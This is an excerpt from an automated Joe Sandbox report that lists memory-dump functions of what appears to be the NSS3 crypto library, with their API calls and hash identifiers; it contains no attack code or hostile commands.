Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Util$ArenaItem_$Pool$Error$Alloc_CallCompareCopyDecodeFindFinishFreeInitOnceQuickTag_Zfreefreememcpy
String ID: security
API String ID: 1076417423-3315324353
Opcode ID: 81dc1a527a26cef8f5b6498c9918d90dd54e5b37f158845f52ee6c1df0ac9813
Instruction ID: e91151c22b3b461d319d8d9fadc5a82047ad503acd605b6a46a707e2fe9e9bd0
Opcode Fuzzy Hash: 81dc1a527a26cef8f5b6498c9918d90dd54e5b37f158845f52ee6c1df0ac9813
Instruction Fuzzy Hash: 9B21F8B1A04300ABD3149B55AC41F9B77A8EB8535CF050A3DF949A7741E731E9188BAA

Function 6C5BCC70 Relevance: 13.8, APIs: 9, Instructions: 313COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,00000100,?), ref: 6C5BCD08
PK11_DoesMechanism.NSS3(?,?), ref: 6C5BCE16
PR_SetError.NSS3(00000000,00000000), ref: 6C5BD079

Part of subcall function 6C61C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C61C2BF

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: DoesErrorK11_MechanismValuememcpy
String ID:
API String ID: 1351604052-0
Opcode ID: fedea37d3664a58c2e3b864250054932b88de096e4ba54aadbc26fe76f3ecbc2
Instruction ID: a6c918cf8b5887e41399d0efa1e08f8ee3c65c366c7ccc7d99886b1c989ff518
Opcode Fuzzy Hash: fedea37d3664a58c2e3b864250054932b88de096e4ba54aadbc26fe76f3ecbc2
Instruction Fuzzy Hash: 5AC19CB5A002199FDB20CF24CC90BDABBB4BF48318F1441A8E948A7741E775EE95CF94

Function 6C5ADC60 Relevance: 13.7, APIs: 9, Instructions: 245memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,6C5B97C1,?,00000000,00000000,?,?,?,00000000,?,6C597F4A,00000000), ref: 6C5ADC68

Part of subcall function 6C5D0BE0: malloc.MOZGLUE(6C5C8D2D,?,00000000,?), ref: 6C5D0BF8
Part of subcall function 6C5D0BE0: TlsGetValue.KERNEL32(6C5C8D2D,?,00000000,?), ref: 6C5D0C15

PORT_Alloc_Util.NSS3(00000008,00000000,?,?,?,00000000,?,6C597F4A,00000000,?,00000000,00000000), ref: 6C5ADD36
PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6C597F4A,00000000,?,00000000,00000000), ref: 6C5ADE2D
memcpy.VCRUNTIME140(00000000,00000000,?,?,00000000,?,?,?,00000000,?,6C597F4A,00000000,?,00000000,00000000), ref: 6C5ADE43
PORT_Alloc_Util.NSS3(0000000C,00000000,?,?,?,00000000,?,6C597F4A,00000000,?,00000000,00000000), ref: 6C5ADE76
PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6C597F4A,00000000,?,00000000,00000000), ref: 6C5ADF32
memcpy.VCRUNTIME140(-00000010,00000000,00000000,?,00000000,?,?,?,00000000,?,6C597F4A,00000000,?,00000000,00000000), ref: 6C5ADF5F
PORT_Alloc_Util.NSS3(00000004,00000000,?,?,?,00000000,?,6C597F4A,00000000,?,00000000,00000000), ref: 6C5ADF78
PORT_Alloc_Util.NSS3(00000010,00000000,?,?,?,00000000,?,6C597F4A,00000000,?,00000000,00000000), ref: 6C5ADFAA

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Alloc_Util$memcpy$Valuemalloc
String ID:
API String ID: 1886645929-0
Opcode ID: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
Instruction ID: 83b97dcba4a20bfd6ea7374924e3379b4ebb21e6b4dac5868d2bab485eb0909a
Opcode Fuzzy Hash: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
Instruction Fuzzy Hash: 1A81EA716066018BFF10AEDBCC9036E72D2DB64348F20843ADD5ACAFE1E774D886C602

Function 6C583C60 Relevance: 13.7, APIs: 9, Instructions: 213memoryCOMMON

Download Yara Rule

APIs

PK11_GetCertFromPrivateKey.NSS3(?), ref: 6C583C76
CERT_DestroyCertificate.NSS3(00000000), ref: 6C583C94

Part of subcall function 6C5795B0: TlsGetValue.KERNEL32(00000000,?,6C5900D2,00000000), ref: 6C5795D2
Part of subcall function 6C5795B0: EnterCriticalSection.KERNEL32(?,?,?,6C5900D2,00000000), ref: 6C5795E7
Part of subcall function 6C5795B0: PR_Unlock.NSS3(?,?,?,?,6C5900D2,00000000), ref: 6C579605

PORT_NewArena_Util.NSS3(00000800), ref: 6C583CB2
PORT_ArenaAlloc_Util.NSS3(00000000,000000AC), ref: 6C583CCA
memset.VCRUNTIME140(00000000,00000000,000000AC), ref: 6C583CE1

Part of subcall function 6C583090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C59AE42), ref: 6C5830AA
Part of subcall function 6C583090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C5830C7
Part of subcall function 6C583090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C5830E5
Part of subcall function 6C583090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C583116
Part of subcall function 6C583090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C58312B
Part of subcall function 6C583090: PK11_DestroyObject.NSS3(?,?), ref: 6C583154
Part of subcall function 6C583090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C58317E

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Util$Arena_$Alloc_ArenaDestroyK11_memset$AlgorithmCertCertificateCopyCriticalEnterFreeFromItem_ObjectPrivateSectionTag_UnlockValue
String ID:
API String ID: 3167935723-0
Opcode ID: 1cf7f79002a6c1419ad4643256ab6585fe4f063c00824b38dc2e379eb6b4b3e2
Instruction ID: 144fee4f5d1557886d62c53203915662a5fc1c9599ce494a41c73f4b86038d82
Opcode Fuzzy Hash: 1cf7f79002a6c1419ad4643256ab6585fe4f063c00824b38dc2e379eb6b4b3e2
Instruction Fuzzy Hash: B161D775A01211ABEF105F65DC41FAB7AB9EF44748F084428FD0AAAA52F731DD14C7B1

Function 6C5C3D40 Relevance: 13.7, APIs: 9, Instructions: 169COMMON

Download Yara Rule

APIs

Part of subcall function 6C5C3440: PK11_GetAllTokens.NSS3 ref: 6C5C3481
Part of subcall function 6C5C3440: PR_SetError.NSS3(00000000,00000000), ref: 6C5C34A3
Part of subcall function 6C5C3440: TlsGetValue.KERNEL32 ref: 6C5C352E
Part of subcall function 6C5C3440: EnterCriticalSection.KERNEL32(?), ref: 6C5C3542
Part of subcall function 6C5C3440: PR_Unlock.NSS3(?), ref: 6C5C355B

TlsGetValue.KERNEL32 ref: 6C5C3D8B
EnterCriticalSection.KERNEL32(?), ref: 6C5C3D9F
PR_Unlock.NSS3(?), ref: 6C5C3DCA
PR_SetError.NSS3(00000000,00000000), ref: 6C5C3DE2
PR_SetError.NSS3(FFFFE040,00000000), ref: 6C5C3E4F

Part of subcall function 6C61C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C61C2BF

TlsGetValue.KERNEL32 ref: 6C5C3E97
EnterCriticalSection.KERNEL32(?), ref: 6C5C3EAB
PR_Unlock.NSS3(?), ref: 6C5C3ED6
PR_SetError.NSS3(00000000,00000000), ref: 6C5C3EEE

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: ErrorValue$CriticalEnterSectionUnlock$K11_Tokens
String ID:
API String ID: 2554137219-0
Opcode ID: 3efe4774ae32d3aac9d3966b0ce885c304d104ac66b67479976154ba6d46daaa
Instruction ID: 1f8e3b2a63aab652b057a770c0e8d48ec9b33ff9504b93a30394c3c897035422
Opcode Fuzzy Hash: 3efe4774ae32d3aac9d3966b0ce885c304d104ac66b67479976154ba6d46daaa
Instruction Fuzzy Hash: 05512575B002049FDB01AFAADC84BAA77B4EF45319F05053CDE094BA22EB31E954CBD6

Function 6C572C30 Relevance: 13.7, APIs: 9, Instructions: 166memoryCOMMON

Download Yara Rule

APIs

PORT_ZAlloc_Util.NSS3(2AF198CD), ref: 6C572C5D

Part of subcall function 6C5D0D30: calloc.MOZGLUE ref: 6C5D0D50
Part of subcall function 6C5D0D30: TlsGetValue.KERNEL32 ref: 6C5D0D6D

CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6C572C8D
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C572CE0

Part of subcall function 6C572E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C572CDA,?,00000000), ref: 6C572E1E
Part of subcall function 6C572E00: SECITEM_DupItem_Util.NSS3(?), ref: 6C572E33
Part of subcall function 6C572E00: TlsGetValue.KERNEL32 ref: 6C572E4E
Part of subcall function 6C572E00: EnterCriticalSection.KERNEL32(?), ref: 6C572E5E
Part of subcall function 6C572E00: PL_HashTableLookup.NSS3(?), ref: 6C572E71
Part of subcall function 6C572E00: PL_HashTableRemove.NSS3(?), ref: 6C572E84
Part of subcall function 6C572E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6C572E96
Part of subcall function 6C572E00: PR_Unlock.NSS3 ref: 6C572EA9

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C572D23
CERT_IsCACert.NSS3(00000001,00000000), ref: 6C572D30
CERT_MakeCANickname.NSS3(00000001), ref: 6C572D3F
free.MOZGLUE(00000000), ref: 6C572D73
CERT_DestroyCertificate.NSS3(?), ref: 6C572DB8
free.MOZGLUE ref: 6C572DC8

Part of subcall function 6C573E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C573EC2
Part of subcall function 6C573E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C573ED6
Part of subcall function 6C573E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C573EEE
Part of subcall function 6C573E60: PR_CallOnce.NSS3(6C6D2AA4,6C5D12D0), ref: 6C573F02
Part of subcall function 6C573E60: PL_FreeArenaPool.NSS3 ref: 6C573F14
Part of subcall function 6C573E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C573F27

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
String ID:
API String ID: 3941837925-0
Opcode ID: 391978151e74225038e476b29732d03a925ee6bc5c6becfb5467f880fc84771b
Instruction ID: 03e06f216011401d61c1478c164756d2fee9729b7ba6400eaea830b83775700c
Opcode Fuzzy Hash: 391978151e74225038e476b29732d03a925ee6bc5c6becfb5467f880fc84771b
Instruction Fuzzy Hash: 9951C071A04211DBEB20DF69DD89B5B77E5EF94348F14082CEC5983650E731E8968BA2

Function 6C577CC0 Relevance: 13.6, APIs: 9, Instructions: 132threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C5740D0: SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6C573F7F,?,00000055,?,?,6C571666,?,?), ref: 6C5740D9
Part of subcall function 6C5740D0: SECITEM_CompareItem_Util.NSS3(00000000,?,?,?,6C571666,?,?), ref: 6C5740FC
Part of subcall function 6C5740D0: PR_SetError.NSS3(FFFFE023,00000000,?,?,6C571666,?,?), ref: 6C574138

PR_GetCurrentThread.NSS3 ref: 6C577CFD

Part of subcall function 6C639BF0: TlsGetValue.KERNEL32(?,?,?,6C680A75), ref: 6C639C07

SECITEM_ItemsAreEqual_Util.NSS3(?,6C699030), ref: 6C577D1B

Part of subcall function 6C5CFD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6C571A3E,00000048,00000054), ref: 6C5CFD56

SECITEM_ItemsAreEqual_Util.NSS3(?,6C699048), ref: 6C577D2F
SECITEM_CopyItem_Util.NSS3(00000000,?,00000000), ref: 6C577D50
PR_GetCurrentThread.NSS3 ref: 6C577D61
PORT_ArenaMark_Util.NSS3(?), ref: 6C577D7D
free.MOZGLUE(?), ref: 6C577D9C
CERT_CheckNameSpace.NSS3(?,00000000,00000000), ref: 6C577DB8
PR_SetError.NSS3(FFFFE023,00000000), ref: 6C577E19

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Util$CurrentEqual_ErrorItem_ItemsThread$ArenaCheckCompareCopyFindMark_NameSpaceTag_Valuefreememcmp
String ID:
API String ID: 70581797-0
Opcode ID: c0a1a30c447ca82d6cc02a9c75f1fe77fba30c2c424936a6aff7b3c89c45903f
Instruction ID: 14043f945ba6d75c271c019259bc28e6fe3b1933ccabfc4cd677a0e15dab56c4
Opcode Fuzzy Hash: c0a1a30c447ca82d6cc02a9c75f1fe77fba30c2c424936a6aff7b3c89c45903f
Instruction Fuzzy Hash: D341F872A0011A9FDB118E69AD41BAF33E4EF4139CF050164EC19A7750E730ED958BF5

Function 6C587EB0 Relevance: 13.6, APIs: 9, Instructions: 124threadCOMMON

Download Yara Rule

APIs

free.MOZGLUE(?,00000000,00000000,?,?,?,6C5880DD), ref: 6C587F15
DeleteCriticalSection.KERNEL32(?,00000000,00000000,?,?,?,6C5880DD), ref: 6C587F36
free.MOZGLUE(?,?,?,6C5880DD), ref: 6C587F3D
SECOID_Shutdown.NSS3(00000000,00000000,?,?,?,6C5880DD), ref: 6C587F5D
DeleteCriticalSection.KERNEL32(?,6C5880DD), ref: 6C587F94
free.MOZGLUE(?), ref: 6C587F9B
PR_SetError.NSS3(FFFFE08B,00000000,6C5880DD), ref: 6C587FD0
PR_SetThreadPrivate.NSS3(FFFFFFFF,00000000,6C5880DD), ref: 6C587FE6
free.MOZGLUE(?,6C5880DD), ref: 6C58802D

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: free$CriticalDeleteSection$ErrorPrivateShutdownThread
String ID:
API String ID: 4037168058-0
Opcode ID: 8754df51f8947bc02abea460ecdf6cb918a646202ecbe6d804fa4ae870e659a3
Instruction ID: bb73a0362cfd836fd52c59f756104252af4ef2ce947390aab8674dbcd4b75d2d
Opcode Fuzzy Hash: 8754df51f8947bc02abea460ecdf6cb918a646202ecbe6d804fa4ae870e659a3
Instruction Fuzzy Hash: 2941C8B1B021609BDB10DFBB8CC8A4A3775BB87358F154229F61687B40D731AD05CBA9

Function 6C5CFEE0 Relevance: 13.6, APIs: 9, Instructions: 120memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5CFF00

Part of subcall function 6C61C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C61C2BF

PORT_ArenaMark_Util.NSS3(?), ref: 6C5CFF18
PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C5CFF26
PORT_ArenaMark_Util.NSS3(?), ref: 6C5CFF4F
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C5CFF7A
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C5CFF8C

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: ArenaUtil$Alloc_Mark_$ErrorValuememset
String ID:
API String ID: 1233137751-0
Opcode ID: ec0707860add4129e182463b2de03e560fad5a3dfcece4946c3d4ed03c5a4416
Instruction ID: ee66aeab8dd5cf18a7e1f006a28685061c63585f67da40b844a6fc1c44a35634
Opcode Fuzzy Hash: ec0707860add4129e182463b2de03e560fad5a3dfcece4946c3d4ed03c5a4416
Instruction Fuzzy Hash: C63148B2A01312ABE7108F998C40B5B76A8EF86348F15423DEC18D7B40E771E904C7D7

Function 6C517D70 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 179COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C517E27
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C517E67
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001065F,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000003,?,?), ref: 6C517EED
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001066C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C517F2E

Strings

database corruption, xrefs: 6C517EE2, 6C517F23
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C517ED8, 6C517F08, 6C517F19
%s at line %d of [%.10s], xrefs: 6C517EE7, 6C517F28

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 912837312-598938438
Opcode ID: b4692bda7ec17259e11dcaaecb129c91887bb47def803fed6ffb96ed284de260
Instruction ID: 8fb3f30bfe754881909dd516b991160fa5a033a311a2a30396dceb4fbeb753ea
Opcode Fuzzy Hash: b4692bda7ec17259e11dcaaecb129c91887bb47def803fed6ffb96ed284de260
Instruction Fuzzy Hash: 5661B074A082059FEB05CF69CC84BAA37B2BF85348F1449A8EC095BB51D731EC56CBA5

Function 6C4FFCF0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 155COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124AC,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C4FFD7A
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C4FFD94
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124BF,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C4FFE3C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C4FFE83

Part of subcall function 6C4FFEC0: memcmp.VCRUNTIME140(?,?,?,?,00000000,?), ref: 6C4FFEFA
Part of subcall function 6C4FFEC0: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00000000,?), ref: 6C4FFF3B

Strings

database corruption, xrefs: 6C4FFD6E, 6C4FFE30
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C4FFD64, 6C4FFE26
%s at line %d of [%.10s], xrefs: 6C4FFD73, 6C4FFE35

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log$memcmpmemcpy
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 1169254434-598938438
Opcode ID: ad8d017820cafcaef19b1384f3d414f621e4cc48284a90dd2b0ac0cff85e1995
Instruction ID: 6999ef7baa91d1376cfa5c46b7fd4d88f48d10e26f1f19b8f509962f69fe3206
Opcode Fuzzy Hash: ad8d017820cafcaef19b1384f3d414f621e4cc48284a90dd2b0ac0cff85e1995
Instruction Fuzzy Hash: 2F516371A012059FDB04CF99C8D0EAEB7F1EF88308F144069E915AB752E735EC56CBA5

Function 6C642F70 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 123stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C642FFD
sqlite3_initialize.NSS3 ref: 6C643007
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C643032
sqlite3_mprintf.NSS3(6C6AAAF9,?), ref: 6C643073
sqlite3_free.NSS3(?), ref: 6C6430B3
sqlite3_mprintf.NSS3(sqlite3_get_table() called with two or more incompatible queries), ref: 6C6430C0

Strings

sqlite3_get_table() called with two or more incompatible queries, xrefs: 6C6430BB

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
